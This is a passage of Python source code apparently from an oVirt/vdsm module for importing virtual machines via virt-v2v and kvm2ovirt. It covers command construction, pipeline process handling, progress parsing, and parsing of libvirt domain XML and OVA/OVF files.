    Subclasses supply _command() (the full argument list) and execute()
    (a context manager yielding the running pipeline process).
    """
    def __init__(self, vminfo, vmid, irs):
        # vminfo: dict describing the VM to import (disks, format, ...)
        # vmid:   job/VM UUID, used to name log and temp files
        # irs:    storage interface used to prepare/tear down volumes
        self._vminfo = vminfo
        self._vmid = vmid
        self._irs = irs
        self._prepared_volumes = []
        self._passwd_file = os.path.join(_V2V_DIR, "%s.tmp" % vmid)
        self._password = password.ProtectedPassword('')
        self._base_command = [_VIRT_V2V.cmd, '-v', '-x']
        self._query_v2v_caps()
        if 'qcow2_compat' in vminfo:
            qcow2_compat = vminfo['qcow2_compat']
            if qcow2_compat not in _QCOW2_COMPAT_SUPPORTED:
                logging.error('Invalid QCOW2 compat version %r' %
                              qcow2_compat)
                raise ValueError('Invalid QCOW2 compat version %r' %
                                 qcow2_compat)
            if 'vdsm-compat-option' in self._v2v_caps:
                self._base_command.extend(['--vdsm-compat', qcow2_compat])
            elif qcow2_compat != '0.10':
                # Note: qcow2 is only a suggestion from the engine
                # if virt-v2v doesn't support it we fall back to default
                logging.info('virt-v2v not supporting qcow2 compat version: '
                             '%r', qcow2_compat)

    def execute(self):
        # Context manager yielding the running import process.
        raise NotImplementedError("Subclass must implement this")

    def _command(self):
        # Full virt-v2v argument list for this import.
        raise NotImplementedError("Subclass must implement this")

    def _start_helper(self):
        """Start virt-v2v piped through tee, so its output is both
        captured (for parsing) and stored in a timestamped log file."""
        timestamp = time.strftime('%Y%m%dT%H%M%S')
        log = os.path.join(_LOG_DIR,
                           "import-%s-%s.log" % (self._vmid, timestamp))
        logging.info("Storing import log at: %r", log)
        v2v = _simple_exec_cmd(self._command(),
                               nice=NICENESS.HIGH,
                               ioclass=IOCLASS.IDLE,
                               env=self._environment(),
                               stdout=subprocess.PIPE,
                               stderr=subprocess.STDOUT)
        tee = _simple_exec_cmd(['tee', log],
                               nice=NICENESS.HIGH,
                               ioclass=IOCLASS.IDLE,
                               stdin=v2v.stdout,
                               stdout=subprocess.PIPE)

        return PipelineProc(v2v, tee)

    def _get_disk_format(self):
        # Map the engine's "cow" naming to qemu's "qcow2"; default is raw.
        fmt = self._vminfo.get('format', 'raw').lower()
        return "qcow2" if fmt == "cow" else fmt

    def _disk_parameters(self):
        """Return --vdsm-image-uuid/--vdsm-vol-uuid option pairs for
        every disk; raise InvalidInputError on missing ids."""
        parameters = []
        for disk in self._vminfo['disks']:
            try:
                parameters.append('--vdsm-image-uuid')
                parameters.append(disk['imageID'])
                parameters.append('--vdsm-vol-uuid')
                parameters.append(disk['volumeID'])
            except KeyError as e:
                raise InvalidInputError('Job %r missing required property: %s'
                                        % (self._vmid, e))
        return parameters

    @contextmanager
    def _volumes(self):
        # Prepare all destination volumes, tear them down on exit.
        self._prepare_volumes()
        try:
            yield
        finally:
            self._teardown_volumes()

    def _prepare_volumes(self):
        """Ask storage (irs) to prepare every destination volume and
        record the prepared drives (with their paths) for teardown."""
        if len(self._vminfo['disks']) < 1:
            raise InvalidInputError('Job %r cannot import vm with no disk',
                                    self._vmid)

        for disk in self._vminfo['disks']:
            drive = {'poolID': self._vminfo['poolID'],
                     'domainID': self._vminfo['domainID'],
                     'volumeID': disk['volumeID'],
                     'imageID': disk['imageID']}
            res = self._irs.prepareImage(drive['domainID'],
                                         drive['poolID'],
                                         drive['imageID'],
                                         drive['volumeID'])
            if res['status']['code']:
                raise VolumeError('Job %r bad volume specification: %s' %
                                  (self._vmid, drive))

            drive['path'] = res['path']
            self._prepared_volumes.append(drive)

    def _teardown_volumes(self):
        # Best effort: log and continue so one failure doesn't leak others.
        for drive in self._prepared_volumes:
            try:
                self._irs.teardownImage(drive['domainID'],
                                        drive['poolID'],
                                        drive['imageID'])
            except Exception as e:
                logging.error('Job %r error tearing down drive: %s',
                              self._vmid, e)

    def _get_storage_domain_path(self, path):
        '''
        prepareImage returns /prefix/sdUUID/images/imgUUID/volUUID
        we need storage domain absolute path so we go up 3 levels
        '''
        return path.rsplit(os.sep, 3)[0]

    def _environment(self):
        # Provide some sane environment
        env = os.environ.copy()

        # virt-v2v specific variables
        env['LIBGUESTFS_BACKEND'] = 'direct'
        if 'virtio_iso_path' in self._vminfo:
            env['VIRTIO_WIN'] = self._vminfo['virtio_iso_path']
        return env

    @contextmanager
    def _password_file(self):
        """Write the protected password to a mode-0600 temp file (used
        via --password-file) and remove it when the context exits."""
        fd = os.open(self._passwd_file, os.O_WRONLY | os.O_CREAT, 0o600)
        try:
            if self._password.value is None:
                os.write(fd, "")
            else:
                os.write(fd, self._password.value)
        finally:
            os.close(fd)
        try:
            yield
        finally:
            try:
                os.remove(self._passwd_file)
            except Exception:
                logging.exception("Job %r error removing passwd file: %s",
                                  self._vmid, self._passwd_file)

    def _query_v2v_caps(self):
        """Run 'virt-v2v --machine-readable' and cache its capability
        lines in self._v2v_caps (starts empty in case the query fails)."""
        self._v2v_caps = frozenset()
        p = _simple_exec_cmd([_VIRT_V2V.cmd, '--machine-readable'],
                             env=os.environ.copy(),
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with terminating(p):
            try:
                out, err = p.communicate()
            except Exception:
                logging.exception('Terminating virt-v2v process after error')
                raise
        if p.returncode != 0:
            raise V2VProcessError(
                'virt-v2v exited with code: %d, stderr: %r' %
                (p.returncode, err))

        self._v2v_caps = frozenset(out.splitlines())
        logging.debug("Detected virt-v2v capabilities: %r", self._v2v_caps)


class LibvirtCommand(V2VCommand):
    """Import a VM through a generic libvirt connection (e.g. VMware vpx)."""

    def __init__(self, uri, username, password, vminfo, vmid, irs):
        super(LibvirtCommand, self).__init__(vminfo, vmid, irs)
        self._uri = uri
        self._username = username
        self._password = password

    def _command(self):
        # Bug fix: copy the base command instead of aliasing it.  The old
        # "cmd = self._base_command" mutated the shared list in place, so
        # every call to _command() appended the options again.
        cmd = list(self._base_command)
        cmd.extend(['-ic', self._uri,
                    '-o', 'vdsm',
                    '-of', self._get_disk_format(),
                    '-oa', self._vminfo.get('allocation', 'sparse').lower()])
        cmd.extend(self._disk_parameters())
        cmd.extend(['--password-file',
                    self._passwd_file,
                    '--vdsm-vm-uuid',
                    self._vmid,
                    '--vdsm-ovf-output',
                    _V2V_DIR,
                    '--machine-readable',
                    '-os',
                    self._get_storage_domain_path(
                        self._prepared_volumes[0]['path']),
                    self._vminfo['vmName']])
        return cmd

    @contextmanager
    def execute(self):
        # Volumes must be prepared before _command() runs: it reads
        # self._prepared_volumes[0] to locate the storage domain.
        with self._volumes(), self._password_file():
            yield self._start_helper()


class OvaCommand(V2VCommand):
    """Import a VM from a local OVA archive."""

    def __init__(self, ova_path, vminfo, vmid, irs):
        super(OvaCommand, self).__init__(vminfo, vmid, irs)
        self._ova_path = ova_path

    def _command(self):
        # Bug fix: copy the base command instead of aliasing it.  The old
        # "cmd = self._base_command" mutated the shared list in place, so
        # every call to _command() appended the options again.
        cmd = list(self._base_command)
        cmd.extend(['-i', 'ova', self._ova_path,
                    '-o', 'vdsm',
                    '-of', self._get_disk_format(),
                    '-oa', self._vminfo.get('allocation', 'sparse').lower(),
                    '--vdsm-vm-uuid',
                    self._vmid,
                    '--vdsm-ovf-output',
                    _V2V_DIR,
                    '--machine-readable',
                    '-os',
                    self._get_storage_domain_path(
                        self._prepared_volumes[0]['path'])])
        cmd.extend(self._disk_parameters())
        return cmd

    @contextmanager
    def execute(self):
        # Volumes must be prepared before _command() runs: it reads
        # self._prepared_volumes[0] to locate the storage domain.
        with self._volumes():
            yield self._start_helper()


class XenCommand(V2VCommand):
    """
    virt-v2v invocation that imports a VM from Xen over the xen+ssh
    protocol.  Prerequisites on the importing host:
    - the vdsm user is enabled in /etc/passwd
    - ssh keys were generated via ssh-keygen
    - the public key was exchanged with the source host's user
    - the source host appears in ~/.ssh/known_hosts (achieved by
      ssh-ing to it once before importing the vm)
    """

    def __init__(self, uri, vminfo, job_id, irs):
        super(XenCommand, self).__init__(vminfo, job_id, irs)
        self._uri = uri
        # Supplies the ssh key to virt-v2v's xen+ssh connection.
        self._ssh_agent = SSHAgent()

    def _command(self):
        """Build the virt-v2v argv for a Xen import."""
        args = self._base_command
        args += ['-ic', self._uri,
                 '-o', 'vdsm',
                 '-of', self._get_disk_format(),
                 '-oa', self._vminfo.get('allocation', 'sparse').lower()]
        args += self._disk_parameters()
        # The VM name must stay the final positional argument.
        args += ['--vdsm-vm-uuid',
                 self._vmid,
                 '--vdsm-ovf-output',
                 _V2V_DIR,
                 '--machine-readable',
                 '-os',
                 self._get_storage_domain_path(
                     self._prepared_volumes[0]['path']),
                 self._vminfo['vmName']]
        return args

    @contextmanager
    def execute(self):
        """Run the helper with volumes prepared and the ssh agent alive."""
        with self._volumes():
            with self._ssh_agent:
                yield self._start_helper()

    def _environment(self):
        """Extend the base environment with the ssh agent's auth variables."""
        env = super(XenCommand, self)._environment()
        env.update(self._ssh_agent.auth)
        return env


class KVMCommand(V2VCommand):
    """kvm2ovirt invocation that copies disks directly from a KVM host."""

    def __init__(self, uri, username, password, vminfo, vmid, irs):
        super(KVMCommand, self).__init__(vminfo, vmid, irs)
        self._uri = uri
        self._username = username
        self._password = password

    def _command(self):
        """Build the kvm2ovirt argv."""
        args = [EXT_KVM_2_OVIRT,
                '--uri', self._uri]
        if self._username is not None:
            # Only authenticated connections need credentials.
            args += ['--username', self._username,
                     '--password-file', self._passwd_file]
        sources, storage_types = self._source_images()
        args.append('--source')
        args += sources
        args.append('--dest')
        args += self._dest_images()
        args.append('--storage-type')
        args += storage_types
        args.append('--vm-name')
        args.append(self._vminfo['vmName'])
        return args

    @contextmanager
    def execute(self):
        """Run the helper with volumes and the password file prepared."""
        with self._volumes():
            with self._password_file():
                yield self._start_helper()

    def _source_images(self):
        """Return parallel lists (source paths, disk types) for the source
        VM's disks, read from its libvirt domain XML."""
        con = libvirtconnection.open_connection(uri=self._uri,
                                                username=self._username,
                                                passwd=self._password)

        with closing(con):
            vm = con.lookupByName(self._vminfo['vmName'])
            if vm:
                params = {}
                _add_disks(ET.fromstring(vm.XMLDesc(0)), params)
                sources = []
                types = []
                for disk in params['disks']:
                    # A disk without an alias has no source path to copy.
                    if 'alias' in disk:
                        sources.append(disk['alias'])
                        types.append(disk['disktype'])
                return sources, types

    def _dest_images(self):
        """Return the prepared destination volume paths, in order."""
        return [vol['path'] for vol in self._prepared_volumes]


class PipelineProc(object):
    """Two processes connected by a pipe, driven as a single unit.

    Exposes the pipeline's combined stdout (the second process' stdout),
    the pids of both members, a combined return code, and kill/wait
    helpers that operate on both processes.
    """

    def __init__(self, proc1, proc2):
        self._procs = (proc1, proc2)
        # The pipeline's output is whatever the last process writes.
        self._stdout = proc2.stdout

    def kill(self):
        """
        Kill all processes in a pipeline.

        Some of the processes may have already terminated, but some may be
        still running. Regular kill() raises OSError if the process has already
        terminated. Since we are dealing with multiple processes, to avoid any
        confusion we do not raise OSError at all.
        """
        for p in self._procs:
            logging.debug("Killing pid=%d", p.pid)
            try:
                p.kill()
            except OSError as e:
                # Probably the process has already terminated
                if e.errno != errno.ESRCH:
                    # Bare `raise` (not `raise e`) keeps the original
                    # traceback intact.
                    raise

    @property
    def pids(self):
        """Pids of both pipeline members, in order."""
        return [p.pid for p in self._procs]

    @property
    def returncode(self):
        """
        Returns None if any of the processes is still running. Returns 0 if all
        processes have finished with a zero exit code, otherwise return first
        nonzero exit code.
        """
        ret = 0
        for p in self._procs:
            p.poll()
            if p.returncode is None:
                return None
            if p.returncode != 0 and ret == 0:
                # One of the processes has failed
                ret = p.returncode

        # All processes have finished
        return ret

    @property
    def stdout(self):
        """Readable end of the pipeline's output."""
        return self._stdout

    def wait(self, timeout=None):
        """Wait for both processes.

        Returns False when `timeout` (seconds) expired before both
        finished, True otherwise.  With no timeout, blocks indefinitely.
        """
        if timeout is not None:
            deadline = monotonic_time() + timeout
        else:
            deadline = None

        for p in self._procs:
            if deadline is not None:
                # NOTE: CPopen doesn't support timeout argument, so we
                # poll each process until the shared deadline passes.
                while monotonic_time() < deadline:
                    p.poll()
                    if p.returncode is not None:
                        break
                    time.sleep(1)
            else:
                p.wait()

        if deadline is not None:
            if deadline < monotonic_time() or self.returncode is None:
                # Timed out
                return False

        return True


class ImportVm(object):
    """A single v2v import job.

    Runs the conversion command in a worker thread, parses the helper's
    machine-readable output into progress updates, and exposes the job's
    id/status/description/progress to pollers.
    """

    TERM_DELAY = 30
    PROC_WAIT_TIMEOUT = 30

    def __init__(self, job_id, command):
        """
        :param job_id: unique identifier of this import job
        :param command: command object whose execute() context manager
                        yields the running conversion process
        """
        self._id = job_id
        self._command = command
        self._thread = None

        self._status = STATUS.STARTING
        self._description = ''
        self._disk_progress = 0
        self._disk_count = 1
        self._current_disk = 1
        self._aborted = False
        self._proc = None

    def start(self):
        """Run the import in a background thread named after the job."""
        self._thread = concurrent.thread(self._run, name="v2v/" + self._id[:8])
        self._thread.start()

    def wait(self):
        """Join the worker thread, if it was started and is still alive."""
        if self._thread is not None and self._thread.is_alive():
            self._thread.join()

    @property
    def id(self):
        return self._id

    @property
    def status(self):
        return self._status

    @property
    def description(self):
        return self._description

    @property
    def progress(self):
        '''
        progress is part of multiple disk_progress its
        flat and not 100% accurate - each disk take its
        portion ie if we have 2 disks the first will take
        0-50 and the second 50-100
        '''
        # Disks already fully copied contribute 100 points each; the disk
        # currently being copied contributes its own percentage.
        # BUGFIX: this used self._disk_count instead of self._current_disk,
        # which made the first of N disks start at (N-1)*100/N instead of 0,
        # contradicting the docstring above.
        completed = (self._current_disk - 1) * 100
        return (completed + self._disk_progress) / self._disk_count

    @traceback(msg="Error importing vm")
    def _run(self):
        """Thread body: run the import; on failure record the error and
        try to clean up the helper process."""
        try:
            self._import()
        except Exception as ex:
            if self._aborted:
                logging.debug("Job %r was aborted", self._id)
            else:
                logging.exception("Job %r failed", self._id)
                self._status = STATUS.FAILED
                self._description = str(ex)
                try:
                    if self._proc is not None:
                        self._abort()
                except Exception as e:
                    logging.exception('Job %r, error trying to abort: %r',
                                      self._id, e)

    def _import(self):
        """Run the conversion process and track it to completion."""
        logging.info('Job %r starting import', self._id)

        with self._command.execute() as self._proc:
            self._watch_process_output()
            self._wait_for_process()

            if self._proc.returncode != 0:
                raise V2VProcessError('Job %r process failed exit-code: %r' %
                                      (self._id,
                                       self._proc.returncode))

            if self._status != STATUS.ABORTED:
                self._status = STATUS.DONE
                logging.info('Job %r finished import successfully',
                             self._id)

    def _wait_for_process(self):
        """Wait (bounded) for the process after its output has ended."""
        if self._proc.returncode is not None:
            return
        logging.debug("Job %r waiting for virt-v2v process", self._id)
        if not self._proc.wait(timeout=self.PROC_WAIT_TIMEOUT):
            raise V2VProcessError("Job %r timeout waiting for process pid=%s",
                                  self._id, self._proc.pids)

    def _watch_process_output(self):
        """Parse the helper's stdout, updating status/progress fields."""
        out = io.BufferedReader(io.FileIO(self._proc.stdout.fileno(),
                                mode='r', closefd=False), BUFFSIZE)
        parser = OutputParser()
        for event in parser.parse(out):
            if isinstance(event, ImportProgress):
                self._status = STATUS.COPYING_DISK
                logging.info("Job %r copying disk %d/%d",
                             self._id, event.current_disk, event.disk_count)
                self._disk_progress = 0
                self._current_disk = event.current_disk
                self._disk_count = event.disk_count
                self._description = event.description
            elif isinstance(event, DiskProgress):
                self._disk_progress = event.progress
                # Log only every tenth percent to keep the log readable.
                if event.progress % 10 == 0:
                    logging.info("Job %r copy disk %d progress %d/100",
                                 self._id, self._current_disk, event.progress)
            else:
                raise RuntimeError("Job %r got unexpected parser event: %s" %
                                   (self._id, event))

    def abort(self):
        """Public abort entry point: mark aborted and kill the helper."""
        self._status = STATUS.ABORTED
        logging.info('Job %r aborting...', self._id)
        self._abort()

    def _abort(self):
        """Kill the conversion process (if any) and arrange zombie reaping."""
        self._aborted = True
        if self._proc is None:
            logging.warning(
                'Ignoring request to abort job %r; the job failed to start',
                self._id)
            return
        if self._proc.returncode is None:
            logging.debug('Job %r killing virt-v2v process', self._id)
            try:
                self._proc.kill()
            except OSError as e:
                if e.errno != errno.ESRCH:
                    raise
                logging.debug('Job %r virt-v2v process not running',
                              self._id)
            else:
                logging.debug('Job %r virt-v2v process was killed',
                              self._id)
            finally:
                # Whether or not the kill succeeded, make sure the child
                # processes do not linger as zombies.
                for pid in self._proc.pids:
                    zombiereaper.autoReapPID(pid)


class OutputParser(object):
    """Parses virt-v2v's --machine-readable output into progress events."""

    COPY_DISK_RE = re.compile(r'.*(Copying disk (\d+)/(\d+)).*')
    DISK_PROGRESS_RE = re.compile(r'\s+\((\d+).*')

    def parse(self, stream):
        """Yield ImportProgress/DiskProgress events read from `stream`."""
        for line in stream:
            if 'Copying disk' in line:
                description, current_disk, disk_count = self._parse_line(line)
                yield ImportProgress(int(current_disk), int(disk_count),
                                     description)
                # Percentages for this disk arrive as \r-terminated chunks.
                for chunk in self._iter_progress(stream):
                    progress = self._parse_progress(chunk)
                    if progress is not None:
                        yield DiskProgress(progress)
                    if progress == 100:
                        break

    def _parse_line(self, line):
        """Split a "Copying disk i/n" line into (description, i, n)."""
        m = self.COPY_DISK_RE.match(line)
        if m is None:
            raise OutputParserError('unexpected format in "Copying disk"'
                                    ', line: %r' % line)
        return m.group(1), m.group(2), m.group(3)

    def _iter_progress(self, stream):
        """Yield carriage-return-terminated chunks read from `stream`."""
        chunk = ''
        while True:
            c = stream.read(1)
            if not c:
                raise OutputParserError('copy-disk stream closed unexpectedly')
            chunk += c
            if c == '\r':
                yield chunk
                chunk = ''

    def _parse_progress(self, chunk):
        """Return the integer percentage found in `chunk`, or None."""
        m = self.DISK_PROGRESS_RE.match(chunk)
        if m is None:
            return None
        try:
            return int(m.group(1))
        except ValueError:
            # BUGFIX: call m.groups() -- previously the unbound method
            # object itself was interpolated into the message.
            raise OutputParserError('error parsing progress regex: %r'
                                    % (m.groups(),))


def _mem_to_mib(size, unit):
    """Convert a libvirt memory amount to MiB.

    `unit` follows the currentMemory "unit" attribute; anything outside
    bytes..TiB raises InvalidVMConfiguration.
    """
    converters = {
        'bytes': lambda s: s / 1024 / 1024,
        'b': lambda s: s / 1024 / 1024,
        'kib': lambda s: s / 1024,
        'k': lambda s: s / 1024,
        'mib': lambda s: s,
        'm': lambda s: s,
        'gib': lambda s: s * 1024,
        'g': lambda s: s * 1024,
        'tib': lambda s: s * 1024 * 1024,
        't': lambda s: s * 1024 * 1024,
    }
    try:
        convert = converters[unit.lower()]
    except KeyError:
        raise InvalidVMConfiguration("Invalid currentMemory unit attribute:"
                                     " %r" % unit)
    return convert(size)


def _list_domains(conn):
    """Yield every libvirt domain visible on `conn`.

    Prefers the modern listAllDomains() call; on old libvirt clients
    (VIR_ERR_NO_SUPPORT) falls back to enumerating defined domains by
    name and running domains by id, de-duplicating between the passes.
    """
    try:
        for vm in conn.listAllDomains():
            yield vm
    # TODO: use only the new API (no need to fall back to listDefinedDomains)
    #       when supported in Xen under RHEL 5.x
    except libvirt.libvirtError as e:
        if e.get_error_code() != libvirt.VIR_ERR_NO_SUPPORT:
            raise
        # Support for old libvirt clients
        seen = set()  # names already yielded by the defined-domains pass
        for name in conn.listDefinedDomains():
            try:
                vm = conn.lookupByName(name)
            except libvirt.libvirtError as e:
                # The domain may have vanished between listing and lookup.
                logging.error("Error looking up vm %r: %s", name, e)
            else:
                seen.add(name)
                yield vm
        for domainId in conn.listDomainsID():
            try:
                vm = conn.lookupByID(domainId)
            except libvirt.libvirtError as e:
                logging.error("Error looking up vm by id %r: %s", domainId, e)
            else:
                # Skip domains already produced by the name-based pass.
                if vm.name() not in seen:
                    yield vm


def _add_vm(conn, vms, vm):
    """Collect importable information about `vm`; append the resulting
    params dict to `vms` only if every disk's size could be queried."""
    props = {}
    try:
        _add_vm_info(vm, props)
    except libvirt.libvirtError as e:
        logging.error("error getting domain information: %s", e)
        return
    try:
        xml = vm.XMLDesc(0)
    except libvirt.libvirtError as e:
        logging.error("error getting domain xml for vm %r: %s",
                      vm.name(), e)
        return
    try:
        root = ET.fromstring(xml)
    except ET.ParseError as e:
        logging.error('error parsing domain xml: %s', e)
        return
    if not _block_disk_supported(conn, root):
        return
    try:
        _add_general_info(root, props)
    except InvalidVMConfiguration as e:
        logging.error("error adding general info: %s", e)
        return
    _add_snapshot_info(conn, vm, props)
    _add_networks(root, props)
    _add_disks(root, props)
    _add_graphics(root, props)
    _add_video(root, props)

    # Every disk must report its size; a VM with no disks, or any disk
    # whose storage cannot be queried, is skipped with a warning.
    sized = False
    for disk in props['disks']:
        info = _get_disk_info(conn, disk, vm)
        if info is None:
            sized = False
            break
        disk.update(info)
        sized = True
    if sized:
        vms.append(props)
    else:
        logging.warning('Cannot add VM %s due to disk storage error',
                        vm.name())


def _block_disk_supported(conn, root):
    '''
    Currently we do not support importing VMs with block device from
    Xen on Rhel 5.x
    '''
    if conn.getType() != 'Xen':
        return True
    # Only block-backed devices that are actual disks (not cdroms) block
    # the import.
    return not any(d.attrib.get('device', None) == "disk"
                   for d in root.findall('.//disk[@type="block"]'))


def _add_vm_info(vm, params):
    """Record the domain's name and Up/Down status in `params`."""
    params['vmName'] = vm.name()
    # TODO: use new API: vm.state()[0] == libvirt.VIR_DOMAIN_SHUTOFF
    #       when supported in Xen under RHEL 5.x
    params['status'] = "Up" if vm.isActive() else "Down"


def _add_general_info(root, params):
    """Extract uuid, memory (MiB), vcpu count and arch from the domain
    XML into `params`; raises InvalidVMConfiguration on bad values."""
    uuid_elem = root.find('./uuid')
    if uuid_elem is not None:
        params['vmId'] = uuid_elem.text

    mem_elem = root.find('./currentMemory')
    if mem_elem is not None:
        try:
            size = int(mem_elem.text)
        except ValueError:
            raise InvalidVMConfiguration("Invalid 'currentMemory' value: %r"
                                         % mem_elem.text)
        # libvirt defaults currentMemory to KiB when no unit is present.
        params['memSize'] = _mem_to_mib(size, mem_elem.get('unit', 'KiB'))

    vcpu_elem = root.find('./vcpu')
    if vcpu_elem is not None:
        try:
            params['smp'] = int(vcpu_elem.text)
        except ValueError:
            raise InvalidVMConfiguration("Invalid 'vcpu' value: %r"
                                         % vcpu_elem.text)

    os_type = root.find('./os/type/[@arch]')
    if os_type is not None:
        params['arch'] = os_type.get('arch')


def _get_disk_info(conn, disk, vm):
    """Return {'capacity', 'allocation'} (strings, bytes) for `disk`.

    Returns {} when the disk has no source alias, and None when the size
    query fails or the disk type is unsupported (callers treat None as
    "skip this VM").
    """
    if 'alias' not in disk:
        return {}
    try:
        if disk['disktype'] == 'file':
            vol = conn.storageVolLookupByPath(disk['alias'])
            _, capacity, alloc = vol.info()
        elif disk['disktype'] == 'block':
            vol = vm.blockInfo(disk['alias'])
            # We use the physical for allocation
            # in blockInfo can report 0
            capacity, _, alloc = vol
        else:
            logging.error('Unsupported disk type: %r', disk['disktype'])
            # BUGFIX: previously fell through to the return below and hit
            # a NameError on `capacity`; report the failure instead.
            return None
    except libvirt.libvirtError:
        logging.exception("Error getting disk size")
        return None
    return {'capacity': str(capacity), 'allocation': str(alloc)}


def _convert_disk_format(format):
    """Map a qemu image format name to oVirt's volume-format token."""
    # TODO: move to volume format when storage/volume.py
    #       will be accessible for /lib/vdsm/v2v.py
    known_formats = {'qcow2': 'COW', 'raw': 'RAW'}
    if format in known_formats:
        return known_formats[format]
    raise KeyError


def _add_disks(root, params):
    """Populate params['disks'] from the domain XML's file/block disks.

    CD-ROM devices are skipped.  Each entry may carry: type, dev,
    disktype, alias (source path) and format (COW/RAW).
    """
    params['disks'] = []
    disks = (root.findall('.//disk[@type="file"]') +
             root.findall('.//disk[@type="block"]'))
    for disk in disks:
        d = {}
        disktype = disk.get('type')
        device = disk.get('device')
        if device is not None:
            if device == 'cdrom':
                # Skip CD-ROM drives
                continue
            d['type'] = device
        target = disk.find('./target/[@dev]')
        if target is not None:
            d['dev'] = target.get('dev')
        if disktype == 'file':
            d['disktype'] = 'file'
            source = disk.find('./source/[@file]')
            if source is not None:
                d['alias'] = source.get('file')
        elif disktype == 'block':
            d['disktype'] = 'block'
            source = disk.find('./source/[@dev]')
            if source is not None:
                d['alias'] = source.get('dev')
        else:
            # BUGFIX: log the actual attribute value; this used to log the
            # `type` builtin.
            logging.error('Unsupported disk type: %r', disktype)

        driver = disk.find('./driver/[@type]')
        if driver is not None:
            try:
                d["format"] = _convert_disk_format(driver.get('type'))
            except KeyError:
                # BUGFIX: log the offending format string; this used to
                # log the `format` builtin.
                logging.warning("Disk %s has unsupported format: %r", d,
                                driver.get('type'))
        params['disks'].append(d)


def _add_graphics(root, params):
    """Record the graphics device type (e.g. vnc/spice), if present."""
    graphics = root.find('./devices/graphics/[@type]')
    if graphics is not None:
        params['graphics'] = graphics.get('type')


def _add_video(root, params):
    """Record the video card model type, if present."""
    video = root.find('./devices/video/model/[@type]')
    if video is not None:
        params['video'] = video.get('type')


def _add_networks(root, params):
    """Populate params['networks'] from the domain XML's interfaces."""
    params['networks'] = []
    for iface in root.findall('.//interface'):
        net = {}
        if 'type' in iface.attrib:
            net['type'] = iface.attrib['type']
        # Every sub-element is optional; record whatever is present.
        mac = iface.find('./mac/[@address]')
        if mac is not None:
            net['macAddr'] = mac.get('address')
        bridge = iface.find('./source/[@bridge]')
        if bridge is not None:
            net['bridge'] = bridge.get('bridge')
        dev = iface.find('./target/[@dev]')
        if dev is not None:
            net['dev'] = dev.get('dev')
        model = iface.find('./model/[@type]')
        if model is not None:
            net['model'] = model.get('type')
        params['networks'].append(net)


def _add_snapshot_info(conn, vm, params):
    """Set params['has_snapshots'] for `vm` (best effort)."""
    # Snapshot related API is not yet implemented in the libvirt's Xen driver
    if conn.getType() == 'Xen':
        return

    try:
        current = vm.hasCurrentSnapshot()
    except libvirt.libvirtError:
        # Leave the key unset when the query fails.
        logging.exception('Error checking for existing snapshots.')
    else:
        params['has_snapshots'] = current > 0


def _vm_has_snapshot(vm):
    """Return True iff `vm` has a current snapshot; errors count as no
    snapshot."""
    try:
        has_current = vm.hasCurrentSnapshot()
    except libvirt.libvirtError:
        logging.exception('Error checking if snapshot exist for vm: %s.',
                          vm.name())
        return False
    return has_current == 1


def _read_ovf_from_ova(ova_path):
    """Return the OVF document embedded in an OVA.

    virt-v2v accepts OVAs packed as tar or zip archives as well as
    already-extracted directories; all three layouts are handled here.
    """
    if os.path.isdir(ova_path):
        reader = _read_ovf_from_ova_dir
    elif zipfile.is_zipfile(ova_path):
        reader = _read_ovf_from_zip_ova
    elif tarfile.is_tarfile(ova_path):
        reader = _read_ovf_from_tar_ova
    else:
        raise ClientError('Unknown ova format, supported formats:'
                          ' tar, zip or a directory')
    return reader(ova_path)


def _find_ovf(entries):
    """Return the first entry with a .ovf extension, or None."""
    return next((entry for entry in entries
                 if os.path.splitext(entry)[1].lower() == '.ovf'), None)


def _read_ovf_from_ova_dir(ova_path):
    """Return the OVF content from an extracted OVA directory."""
    name = _find_ovf(os.listdir(ova_path))
    if name is None:
        raise ClientError('OVA directory %s does not contain ovf file'
                          % ova_path)
    with open(os.path.join(ova_path, name), 'r') as ovf_file:
        return ovf_file.read()


def _read_ovf_from_zip_ova(ova_path):
    """Return the OVF content from a zip-packed OVA.

    Raises ClientError when the archive contains no .ovf member.
    """
    with open(ova_path, 'rb') as fh:
        # Close the ZipFile deterministically -- it was previously left
        # for the garbage collector to clean up.
        with closing(zipfile.ZipFile(fh)) as zf:
            name = _find_ovf(zf.namelist())
            if name is not None:
                return zf.read(name)
    raise ClientError('OVA does not contains file with .ovf suffix')


def _read_ovf_from_tar_ova(ova_path):
    """Return the OVF content from a tar-packed OVA."""
    with tarfile.open(ova_path) as tar:
        for member in tar:
            if not member.name.endswith('.ovf'):
                continue
            with closing(tar.extractfile(member)) as ovf:
                return ovf.read()
        raise ClientError('OVA does not contains file with .ovf suffix')


def _add_general_ovf_info(vm, node, ns, ova_path):
    """Fill `vm` with name, memory and cpu info parsed from OVF `node`."""
    vm['status'] = 'Down'
    name_elem = node.find('./ovf:VirtualSystem/ovf:Name', ns)
    if name_elem is not None:
        vm['vmName'] = name_elem.text
    else:
        # Fall back to the OVA file name when the OVF carries no name.
        vm['vmName'] = os.path.splitext(os.path.basename(ova_path))[0]

    mem_elem = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
                         'rasd:VirtualQuantity' % _OVF_RESOURCE_MEMORY, ns)
    if mem_elem is None:
        raise V2VError('Error parsing ovf information: no memory size')
    vm['memSize'] = int(mem_elem.text)

    cpu_elem = node.find('.//ovf:Item[rasd:ResourceType="%d"]/'
                         'rasd:VirtualQuantity' % _OVF_RESOURCE_CPU, ns)
    if cpu_elem is None:
        raise V2VError('Error parsing ovf information: no cpu info')
    vm['smp'] = int(cpu_elem.text)


def _get_max_disk_size(populated_size, size):
    """Return the larger of two numeric-string sizes; either may be None,
    in which case the other (possibly None) is returned unchanged."""
    present = [v for v in (populated_size, size) if v is not None]
    if len(present) < 2:
        return present[0] if present else None
    return str(max(int(populated_size), int(size)))


def _parse_allocation_units(units):
    """
    Parse allocation units of the form "bytes * x * y^z"
    The format is defined in:
    DSP0004: Common Information Model (CIM) Infrastructure,
    ANNEX C.1 Programmatic Units

    We conform only to the subset of the format specification and
    base-units must be bytes.

    Returns the integer multiplier converting a capacity expressed in
    these units into bytes.  Raises V2VError on any parse failure.
    """
    # Building blocks of the recognized grammar.
    sp = '[ \t\n]?'
    base_unit = 'byte'
    operator = '[*]'  # we support only multiplication
    number = '[+]?[0-9]+'  # we support only positive integers
    exponent = '[+]?[0-9]+'  # we support only positive integers
    # "* N" -- plain integer multiplier.
    modifier1 = '(?P<m1>{op}{sp}(?P<m1_num>{num}))'.format(
        op=operator,
        num=number,
        sp=sp)
    # "* B^E" -- multiplier expressed as a power, e.g. "2^20".
    modifier2 = \
        '(?P<m2>{op}{sp}' \
